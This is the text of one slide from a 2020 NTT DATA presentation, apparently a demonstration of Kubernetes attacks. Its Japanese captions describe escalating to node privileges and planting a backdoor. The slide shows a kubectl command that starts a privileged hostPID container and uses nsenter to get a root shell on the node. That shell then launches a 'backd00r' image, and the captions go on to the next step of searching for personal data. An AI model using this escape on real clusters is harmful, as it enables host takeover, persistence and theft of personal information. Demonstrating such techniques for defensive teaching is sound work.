Slide 43
Slide 43 text
© 2020 NTT DATA Corporation 43
Nodeに権限昇格してバックドアを作成
$ kubectl run r00tc0ntainer --restart=Never -ti --rm --image lol --overrides
'{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":
["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,“
securityContext":{"privileged":true}}]}}’
r00tc0ntainer / #
r00tc0ntainer / # docker run -d backd00r
Nodeの特権になった
あとは個人情報を探
そう (省略)
バックドア作成した